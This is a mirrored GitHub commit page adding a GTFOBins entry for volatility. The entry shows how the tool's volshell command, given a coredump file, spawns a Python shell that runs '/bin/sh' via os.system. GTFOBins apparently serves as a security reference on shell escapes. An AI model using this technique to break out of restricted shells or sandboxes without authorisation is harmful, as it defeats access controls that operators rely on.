mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add volatility
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
c32b82b5e9
commit
c056acd2e2
8
_gtfobins/volatility.md
Normal file
8
_gtfobins/volatility.md
Normal file
@ -0,0 +1,8 @@
|
|||||||
|
---
|
||||||
|
description: This command requires some valid coredump file which, if not available, can be uploaded to the target. The `volshell` command spawns a [`python`](/gtfobins/python/) shell, other functions may apply.
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
volatility -f file.dump volshell
|
||||||
|
__import__('os').system('/bin/sh')
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user